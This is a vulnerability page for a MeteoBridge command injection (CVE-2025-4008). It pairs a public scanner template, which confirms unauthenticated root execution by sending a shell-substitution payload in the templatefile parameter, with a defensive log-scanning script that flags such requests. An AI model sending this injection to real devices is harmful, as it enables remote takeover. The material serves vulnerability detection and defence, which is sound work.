The Meteobridge web interface lets Meteobridge administrators manage their weather station data collection and administer their Meteobridge system through a web application written in CGI shell scripts and C. This web interface exposes an endpoint that is vulnerable to command injection. Remote unauthenticated attackers can gain arbitrary command execution with elevated privileges (root) on affected devices.
PoC code [public]
id: CVE-2025-4008
info:
  name: MeteoBridge <= 6.1 - Remote Code Execution
  author: iamnoooob,pdresearch
  severity: high
  description: |
    The Meteobridge web interface let meteobridge administrator manage their weather station data collection and administer their meteobridge system through a web application written in CGI shell scripts and C.This web interface exposes an endpoint that is vulnerable to command injection.Remote unauthenticated attackers can gain arbitrary command execution with elevated privileges ( root ) on affected devices.
  reference:
    - https://forum.meteohub.de/viewtopic.php?t=18687
    - https://www.onekey.com/resource/security-advisory-remote-command-execution-on-smartbedded-meteobridge-cve-2025-4008
    - https://nvd.nist.gov/vuln/detail/CVE-2025-4008
  classification:
    cve-id: CVE-2025-4008
    cvss-score: 7.5
    cwe-id: CWE-77
    epss-score: 0.50997
    epss-percentile: 0.97735
  metadata:
    verified: true
    shodan-query: "meteobridge"
    fofa-query: "Meteobridge"
  tags: cve,cve2025,meteobridge,rce,kev,vkev,vuln
http:
  - raw:
      - |
        GET /public/template.cgi?templatefile=$(id) HTTP/1.1
        Host: {{Hostname}}
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Error: template file'
          - 'uid='
          - 'gid='
        condition: and
      - type: status
        status:
          - 200
# digest: 4a0a0047304502210099e6a4ff464bac9012900251fff3f804ab63b53c4cc2806f4b5578efe27e3cfb022071e3f9beb03bd54e0f4c8d7c313ff42a64ebfbf89121b49246a07eecaa69030b:922c64590222798bb761d5b6d8e72950
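
A defender-side check for the request pattern in the template above, as an added example that is not part of the original page or the template authors' code: it scans web access log lines for requests to /public/template.cgi whose templatefile value, after URL decoding, falls outside an allowlist. The allowlist of legitimate template names, the combined log format and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoint and parameter name are taken from the template's request line.
ENDPOINT = "/public/template.cgi"
PARAM = "templatefile"
# Assumption: legitimate template names are plain file names (no shell syntax).
SAFE_VALUE = re.compile(r"[A-Za-z0-9._-]+")
# Assumption: combined log format, i.e. "METHOD target HTTP/x.y" status ...
REQUEST = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')


def suspicious_values(target):
    """Return URL-decoded templatefile values that fall outside the allowlist."""
    parts = urlsplit(target)
    if parts.path != ENDPOINT:
        return []
    # parse_qs percent-decodes, so encoded and literal forms compare equal.
    values = parse_qs(parts.query, keep_blank_values=True).get(PARAM, [])
    return [v for v in values if not SAFE_VALUE.fullmatch(v)]


def scan(lines):
    """Return (client, status, value) for each log line that needs triage."""
    hits = []
    for line in lines:
        m = REQUEST.search(line)
        if not m:
            continue
        client = line.split(" ", 1)[0]
        for value in suspicious_values(m.group("target")):
            hits.append((client, int(m.group("status")), value))
    return hits


# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jun/2025:10:00:00 +0000] "GET /public/template.cgi?templatefile=weather.html HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jun/2025:10:00:05 +0000] "GET /public/template.cgi?templatefile=$(id) HTTP/1.1" 200 97',
    '198.51.100.7 - - [01/Jun/2025:10:00:09 +0000] "GET /public/template.cgi?templatefile=%24%28id%29 HTTP/1.1" 200 97',
    '203.0.113.4 - - [01/Jun/2025:10:01:00 +0000] "GET /index.html HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for client, status, value in scan(SAMPLE_LOG):
        print(f"{client} status={status} templatefile={value!r}")
```

A hit with status 200 matches the template's status matcher and is worth prioritising, since the template treats a 200 response containing command output as confirmation.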